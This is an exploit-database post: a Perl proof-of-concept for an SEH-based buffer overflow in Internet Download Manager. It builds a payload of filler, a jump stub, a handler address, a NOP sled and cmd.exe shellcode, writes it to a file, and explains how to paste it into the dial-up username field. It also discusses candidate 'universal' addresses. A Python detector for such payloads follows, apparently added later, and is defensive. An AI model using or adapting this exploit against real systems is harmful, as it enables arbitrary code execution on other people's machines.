
Internet Download Manager SEH Based Buffer Overflow

Posted on 15 September 2012

#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
# [x] Official Website: http://www.1337day.com
# [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com
# ==========================================
# I'm Dark-Puzzle From Inj3ct0r TEAM
# dark-puzzle[at]live[at]fr
# ==========================================
# White Hat
# Independent Pentester
# exploit coder/bug researcher
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Title        : Internet Download Manager All Versions - 0day SEH Based Buffer Overflow + Universal.
# Author       : Dark-Puzzle (Souhail Hammou)
# Type         : Local
# Risk         : Critical
# Vendor       : Tonec Inc.
# Versions     : All versions of IDM are vulnerable.
# Tested On    : Windows XP Service Pack 2 FR 32-bits.
# Date         : 14 September 2012
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
# Working On   : WinXP SP2 - "Universal".
#
# Usage   : Copy this script to idman2.pl
# Execute : perl idman2.pl
# Go to the file bof.txt, select all, then copy.
# After copying the whole line go to Downloads ---> Options ---> Dial up / VPN ---> paste the line into the
# username field, leave the password field blank, then click Enter.
# French version: go to Telechargement ---> Options ---> Internet ---> then copy the whole line from bof.txt,
# paste it into the username field, leave the password field blank, then click Enter.
# BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++
#
# First of all, this is a different exploit from (Internet Download Manager - Stack Based Overflow Vulnerability).
# Second, script kiddies will be happy with my latest IDMan vulnerabilities, but don't bother: you may face
# some problems with the shellcode in this exploit, so choose the badchars wisely.

my $junk = "A" x 2301;
my $nseh = "\xeb\x32\x90\x90";   # short jmp forward over the SEH record; look down for the universal address
# 0x74ca4cdb OS address (WinXP SP2 only, with oledlg.dll)
my $seh  = "\xdb\x4c\xca\x74";   # For the universal address details look below.
my $nops = "\x90" x 44;
my $shellcode = "\x8B\xEC\x33\xFF\x57".
                "\xC6\x45\xFC\x63\xC6\x45".
                "\xFD\x6D\xC6\x45\xFE\x64".
                "\xC6\x45\xF8\x01\x8D".
                "\x45\xFC\x50\xB8\xC7\x93".
                "\xBF\x77\xFF\xD0";
# CMD.EXE shellcode (after passing the exception to the handler, automatically or with a debugger,
# we will be able to jmp to our shellcode after some nops).
my $junkk = "\x90" x 9000;       # Not actually junk, this is what makes this exploit work =) So be careful.

my $payload = $junk.$nseh.$seh.$nops.$shellcode.$junkk;

# write the raw payload bytes; binmode keeps Windows from translating line endings
open(my $fh, '>', 'bofme.txt') or die "cannot open bofme.txt: $!";
binmode($fh);
print $fh $payload;
close($fh);

print "\x44\x69\x73\x63\x6f\x76\x65\x72\x65\x64\x20\x26\x20\x57\x72\x69\x74\x74\x65\x6e\x20\x42\x79\x20\x44\x61\x72\x6b\x2d\x50\x75\x7a\x7a\x6c\x65\n";
print "Creating Evil File Please Be Patient\n";
sleep(4);
print "\n".length($payload)." bytes has been written\n";
print "File bofme.txt Created Successfuly.\n";
print "Now Copy its content to Username field in IDMan DialUp options\n";

########## Universal Address ##############
# I worked on finding a universal address and that's what I found.
# First you may find some pop r/pop r2/ret / call dword ptr SS:[R+30] addresses in the idman.exe module,
# but the problem here is that all the addresses in this module look like this: 0x00ffffff,
# so the null byte will terminate the string and the vulnerability will not be triggered.
# Ok, the second problem is in idmmkb.dll: we found that the address "rebases".
# As I analysed, I found that the rebase goes between "a" and "b" in the address base
# and the top always stays the same. That gives us two possibilities, 50% each, for the correct
# address in every program execution.
# So all to do here is to try these two addresses manually or using a program.
# The first one : 0x017A1B13
# The second one: 0x017B1B13
# All you have to do is replace one of these in the "pointer to the next SE Handler".
###########################################
# Datasec Team.
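The SEH overwrite this script relies on has a recognisable shape in the data it hands to the application: a long filler run, a 4-byte short-jump stub in the nSEH slot, a handler address that must contain no null byte, and a NOP sled. The Python below is an added example, not part of the original exploit or of IDM, showing how a host agent or configuration validator could flag a credential-field value carrying those indicators; the length and sled thresholds and the sample inputs are constructed assumptions.

```python
"""Heuristic check for an SEH-overwrite payload in a credential field (added example)."""
import re

MAX_SANE_LEN = 256   # assumption: no legitimate dial-up username is this long
MIN_NOP_RUN = 16     # assumption: a NOP sled this long never occurs in real credentials

# nSEH: "\xeb <rel8> \x90 \x90" (short jmp padded to 4 bytes), then the overwritten
# SEH slot: 4 bytes that must all be non-null, since a null would end the copied string.
NSEH_SEH_RE = re.compile(rb"\xeb[\x00-\xff]\x90\x90([^\x00]{4})")
NOP_SLED_RE = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)


def inspect_field(value: bytes) -> dict:
    """Return the SEH-overflow indicators found in one credential-field value."""
    findings = {
        "oversized": len(value) > MAX_SANE_LEN,
        "nop_sled": NOP_SLED_RE.search(value) is not None,
        "seh_stub": False,
        "handler_addr": None,
    }
    m = NSEH_SEH_RE.search(value)
    if m:
        findings["seh_stub"] = True
        # x86 is little-endian: decode the address the fake SEH record would point at
        findings["handler_addr"] = int.from_bytes(m.group(1), "little")
    return findings


def is_suspicious(value: bytes) -> bool:
    """True when any indicator fires; a validator would reject or log the value."""
    f = inspect_field(value)
    return f["oversized"] or f["nop_sled"] or f["seh_stub"]


# Constructed samples: a normal username and a value with the overflow layout
# (filler, jmp stub, placeholder handler address 0x44332211, sled, dummy code).
SAMPLE_BENIGN = b"alice.dialup"
SAMPLE_SUSPICIOUS = (b"A" * 2301 + b"\xeb\x32\x90\x90" + b"\x11\x22\x33\x44"
                     + b"\x90" * 44 + b"\xcc" * 8)

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, is_suspicious(sample), inspect_field(sample))
```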
